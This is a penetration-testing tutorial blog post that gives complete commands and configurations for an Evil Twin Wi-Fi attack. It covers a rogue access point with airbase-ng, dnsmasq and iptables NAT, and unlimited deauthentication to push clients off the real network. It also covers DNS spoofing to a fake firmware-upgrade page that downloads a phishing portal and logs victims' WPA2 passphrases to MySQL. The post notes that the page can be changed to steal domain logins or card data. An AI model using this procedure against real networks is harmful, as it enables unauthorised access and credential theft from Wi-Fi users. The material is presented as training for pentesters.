In this article, I’ll show you how an attacker performs an Evil twin Attack to retrieve cleartext WPA2 passphrase on automation using a fake Access Point.

I am using a sample web page for the demonstration.

An attacker can turn this webpage into basically any web app to steal information.

Information like domain credentials, social login passwords, credit card information etc.

ET Evil Twin noun Definition A fraudulent wireless access point masquerading as a legitimate AP

Evil Twin Attack’s sole purpose is to eavesdrop on WiFi users to steal personal or corporate information without user’s knowledge.

We will not be using any automated script, rather we will understand the concept and perform it manually so that you can make your own script to automate the task and make it simple and usable on low-end devices.

Let’s begin now!

Enhance your Penetration testing skills with rootsh3ll Labs – Penetration Testing Professional Course. It’s a fully practical, lab based course that gives you on-demand virtual environments to sharpen your pentest skills. Click here to learn more about the course description

Evil Twin Attack Methodology

Step 1: Attacker scans the air for the target access point information. Information like SSID name, Channel number, MAC Address.

He then uses that information to create an access point with the same characteristics, hence Evil Twin Attack.

Step 2: Clients on the legitimate AP are repeatedly disconnected, forcing them to connect to the fraudulent access point.

Step 3: As soon as the client is connected to the fake access point, S/he may start browsing the Internet.

Step 4: Client opens up a browser window and sees a web administrator warning saying “Enter WPA password to download and upgrade the router firmware”

Step 5: The moment client enters the password, s/he will be redirected to a loading page and the password is stored in the MySQL database of the attacker machine. The persistent storage and active deauthentication make the Evil Twin attack automated.

An attacker can also abuse this automation by simply changing the webpage.

Imagine the same WPA2 password warning is replaced by “Enter domain credentials to access network resources”. The fake AP will be up all time and storing legitimate credentials in persistent storage.

I’ve discussed it in my Captive Portal Guide. Where I demonstrate how an attacker can hack domain credentials without having a user to open a webpage. Just connecting the WiFi can take a WiFi user to our webpage, automatically.

A WiFi user could be using Android, iOS, a MacOS or a windows laptop. Almost every device is susceptible to it.

but for now, I’ll show you how the attack works with lesser complications.

Prerequisites

Below is the following list of hardware and software used in creating this article. Use any hardware of your choice until it supports the software you’d be using.

Hardware used:

A Laptop (4GB RAM, Intel i5 processor)

Alfa AWUS036NH 1W wireless adapter

Huawei 3G WiFi dongle for Internet connection to the Kali Virtual Machine

Software Used

VMWare Workstation/Fusion 2019

Kali Linux 2019 (Attacker)

Airmon-ng, airodump-ng, airbase-ng, and aireplay-ng

DNSmasq

Iptables

Apache, mysql

Firefox web browser on Ubuntu 16.10 (Victim)

Installing required tools

So far we have aircrack-ng suite of tools, apache, mysql, iptables pre-installed in our Kali Linux virtual machine.

We just need to install dnsmasq for IP address allocation to the client.

Install dnsmasq in Kali Linux

Type in terminal:

apt-get update apt-get install dnsmasq -y

This will update the cache and install latest version of dhcp server in your Kali Linux box.

Now all the required tools are installed. We need to configure apache and the dhcp server so that the access point will allocate the IP address to the client/victim and the client would be able to access our webpage remotely.

Now we will define the IP range and the subnet mask for the DHCP server.

Configure dnsmasq

Create a configuration file for dnsmasq using vim or your favorite text editor and add the following code.

sudo vi ~/Desktop/dnsmasq.conf

~/Desktop/dnsmasq.conf

interface= at0 dhcp-range=10.0.0.10,10.0.0.250,12h dhcp-option=3,10.0.0.1 dhcp-option=6,10.0.0.1 server=8.8.8.8 log-queries log-dhcp listen-address=127.0.0.1

Save and exit. Use your desired name for .conf file.

Pro Tip: Replace at0 with wlan0 everywhere when hostapd is used for creating an access point

Parameter Breakdown

dhcp-range=10.0.0.10,10.0.0.250,12h: Client IP address will range from 10.0.0.10 to 10.0.0.250 and default lease time is 12 hours. dhcp-option=3,10.0.0.1: 3 is code for Default Gateway followed by IP of D.G i.e. 10.0.0.1 dhcp-option=6,10.0.0.1: 6 for DNS Server followed by IP address

(Optional) Resolve airmon-ng and Network Manager Conflict Before enabling monitor mode on the wireless card let’s fix the airmon-ng and network-manager conflict forever. So that we don’t need to kill the network-manager or disconnect any network connection before putting the wireless adapter into monitor mode as we used to run airmon-ng check kill every time we need to start WiFi pentest. Open network manager’s configuration file and put the MAC address of the device you want network-manager to stop managing: vim /etc/NetworkManager/NetworkManager.conf Now add the following at the end of the file [keyfile] unmanaged-devices:mac=AA:BB:CC:DD:EE:FF, A2:B2:C2:D2:E2:F2 Now that you have edited the NetworkManager.conf file you should have no conflicts with airmon-ng in Kali Linux

We are ready to begin now.

Put wireless adapter into monitor mode

Bring up the wireless interface

ifconfig wlan0 up

airmon-ng start wlan0

Putting the card in monitor mode will show a similar output

Now our card is in monitor mode without any issues with network manager. You can simply start monitoring the air with command

airodump-ng wlan0mon

As soon your target AP appears in the airodump-ng output window press CTRL + C and note these three things in a text editor: vi info.txt

Set tx-power of alfa card to max: 1000mW

tx-power stands for transmission power. By default it is set to 20dBm(Decibel metre) or 100mW.

tx-power in mW increases 10 times with every 10 dBm. See the dBm to mW table.

If your country is set to US while installation. then your card should operate on 30 dBm(1000 mW)

ifconfig wlan0mon down iw reg set US ifconfig wlan0mon up iwconfig wlan0mon

If you are thinking about why we need to change the region to operate our card at 1000mW. Here is why

Because different countries have a different legal allowance of Wireless devices at certain power and frequency. That is why Linux distribution has this information built in and you need to change your region to allow yourself to operate at that frequency and power.

Motive of powering up the card is that when creating the hotspot you do not have any need to be near to the victim. victim device will automatically connect to the device with higher signal strength even if it isn’t physically near.

Start Evil Twin Attack

Begin the Evil Twin attack using airbase-ng:

airbase-ng -e "rootsh3ll" -c 1 wlan0mon

By default, airbase-ng creates a tap interface(at0) as the wired interface for bridging/routing the network traffic via the rogue access point. you can see it using ifconfig at0 command.

For the at0 to allocate IP address we need to assign an IP range to itself first.

Allocate IP and Subnet Mask

ifconfig at0 10.0.0.1 up

Note: The Class A IP address, 10.0.0.1, matches the dhcp-option parameter of dnsmasq.conf file. Which means at0 will act as the default gateway under dnsmasq

Now we will use our default Internet-facing interface, eth0, to route all the traffic from the client through it.

In other words, allowing the victim to access the internet and allowing ourselves(attacker) to sniff that traffic.

For that, we will use iptables utility to set a firewall rule to route all the traffic through at0 exclusively.

You will get similar output if using VM

Enable NAT by setting Firewall rules in iptables

Enter the following commands to set-up an actual NAT:

iptables --flush iptables --table nat --append POSTROUTING --out-interface eth0 -j MASQUERADE iptables --append FORWARD --in-interface at0 -j ACCEPT iptables -t nat -A PREROUTING -p tcp --dport 80 -j DNAT --to-destination 10.0.0.1:80 iptables -t nat -A POSTROUTING -j MASQUERADE

Make sure you enter correct interface for –out-interface. eth0 here is the upstream interface where we want to send out packets, coming from at0 interface(rogue AP). Rest is fine.

After entering the above command if you are willing to provide Internet access to the victim just enable routing using the command below

Enable IP forwarding

echo 1 > /proc/sys/net/ipv4/ip_forward

Entering “1” in the ip_forward file will tell the system to enable the rules defined in the IPtables and start forwarding traffic(if any). 0 stand for disabling. Although rules will remain defined until the next reboot.

We will put it 0 for this attack, as we are not providing internet access before we get the WPA password.

We will now start the dhcp server to allow fake AP to allocate an IP address to the clients.

First, we need to tell dhcp server the location of the file we created earlier, which defines IP class, subnet mask, and range of the network.

Start dhcpd Listener

Type in terminal:

dnsmasq -C ~/Desktop/dnsmasq.conf -d

Here -C stands for Configuration file and -d stands for daemon mode

as soon as victim connects you should see similar output for dnsmasq Terminal window

[ dnsmasq ]

dnsmasq: started, version 2.76 cachesize 150 dnsmasq: compile time options: IPv6 GNU-getopt DBus i18n IDN DHCP DHCPv6 no-Lua TFTP conntrack ipset auth DNSSEC loop-detect inotify dnsmasq-dhcp: DHCP, IP range 10.0.0.10 -- 10.0.0.250, lease time 12h dnsmasq: using nameserver 8.8.8.8#53 dnsmasq: reading /etc/resolv.conf dnsmasq: using nameserver 8.8.8.8#53 dnsmasq: using nameserver 192.168.74.2#53 dnsmasq: read /etc/hosts - 5 addresses dnsmasq-dhcp: 1673205542 available DHCP range: 10.0.0.10 -- 10.0.0.250 dnsmasq-dhcp: 1673205542 client provides name: rootsh3ll-iPhone dnsmasq-dhcp: 1673205542 DHCPDISCOVER(at0) 2c:33:61:3d:c4:2e dnsmasq-dhcp: 1673205542 tags: at0 dnsmasq-dhcp: 1673205542 DHCPOFFER(at0) 10.0.0.247 2c:33:61:3a:c4:2f dnsmasq-dhcp: 1673205542 requested options: 1:netmask, 121:classless-static-route, 3:router, <-----------------------------------------SNIP-----------------------------------------> dnsmasq-dhcp: 1673205542 available DHCP range: 10.0.0.10 -- 10.0.0.250

In case you are facing any issue regarding dhcp server, just kill the currently running DHCP processes

killall dnsmasq dhcpd isc-dhcp-server

and run dnsmasq again. It should work now.

Start the Services

Now start the dhcp server, apache and MySQL inline

/etc/init.d/apache2 start /etc/init.d/mysql start

We have our Evil Twin attack vector up and working perfectly. Now we need to set up our fake webpage in action so that victim will see the webpage while browsing and enter the passphrase which s/he uses for his/her access point.

Download Rogue AP Configuration Files

wget https://cdn.rootsh3ll.com/u/20180724181033/Rogue_AP.zip

and simply enter the following command in Terminal

unzip rogue_AP.zip -d /var/www/html/

This command will extract the contents of rogue_AP.zip file and copy them to the apache’s HTML directory so that when the victim opens the browser s/he will automatically be redirected to the default index.HTML webpage.

Now to store the credentials entered by the victim in the HTML page, we need an SQL database.

you will see a dbconnect.php file for that, but to be in effect you need a database created already so that the dbconnect.php will reflect the changes in the DB.

Open terminal and type:

mysql -u root -p

Create a new user fakeap and password fakeap As you cannot execute MySQL queries from PHP being a root user since version 5.7

create user fakeap@localhost identified by 'fakeap';

now create database and table as defined in the dbconnect.php

create database rogue_AP;

use rogue_AP;

create table wpa_keys(password1 varchar(32), password2 varchar(32));

It should go like this:

Grant fakeap all the permissions on rogue_AP Database:

grant all privileges on rogue_AP.* to 'fakeap'@'localhost';

Exit and log in using new user

mysql -u fakeap -p

Select rogue_AP database

use rogue_AP;

Insert a test value in the table

insert into wpa_keys(password1, password2) values ("testpass", "testpass");

select * from wpa_keys;

Note that both the values are same here, that means password and confirmation password should be the same.

Evil Twin attack is now ready, however, you’d need to wait for the client to connect and see the credential coming.

In some cases, your client might already be connected to the original AP. You need to disconnect the client forcefully using aireplay-ng utility.

This is called a deauthentication attack. Attacker sends carefully crafted packets with the BSSID of the Access Point in the air telling every client to de-authenticate. Connected clients honor the command and disconnect themselves.

The attack may be targeted as well by including the target’s MAC address with additional -c parameter in the command line.

Syntax: aireplay-ng --deauth 0 -a <BSSID> <Interface>

aireplay-ng --deauth 0 -a FC:DD:55:08:4F:C2 wlan0mon

--deauth 0 : Unlimited de-authentication requests. Limit the request by entering natural numbers.

We are using 0 so that every client will disconnect from that specific BSSID and connect to our AP as it is of the same name as of real AP and also open type access point.

As soon as a client connects to your AP you will see activity in the airbase-ng terminal window like this

Now to simulate the client side I am using Ubuntu machine connected via WiFi and using a Firefox web browser to illustrate the attack.

Victim can now access the Internet. You can do 2 things at this stage:

Sniff the client traffic Redirect all the traffic to the fake AP page

and that’s what we wanna do. Redirect the client to our fake AP page.

Just run this command:

dnsspoof -i at0

It will redirect all HTTP traffic coming from the at0 interface.

Not HTTPS traffic, due to the built-in list of HSTS web sites. You can’t redirect HTPS traffic without getting an SSL/TLS error on the victim’s machine.

When victim tries to access any website(google.com in this case), s/he will see this page which tell the victim to enter the password to download and upgrade the firmware

Here I am entering “iamrootsh3ll” as the password that I (Victim) think is his/her AP’s password.

As soon as the victim presses [ENTER] s/he will see this

Now coming back to attacker side. You need to check in the MySQL database for the stored passwords.

Just type the previously used command in the mySQL terminal window and see whether a new update is there or not.

After simulating I checked the mySQL DB and here is the output

and that’s how an attacker successfully executes an Evil Twin Attack.

You now have the WPA2 passphrase in plaintext. You may close all the terminal windows and connect back to the real AP to check whether the password is correct or victim was him/herself was a hacker and tricked you!

Although an attacker doesn’t need to perform an Evil Twin Attack to grab the victim. He can also create a random free open WiFi (imagine, Starbucks) to attract the victim on his AP and start pentesting.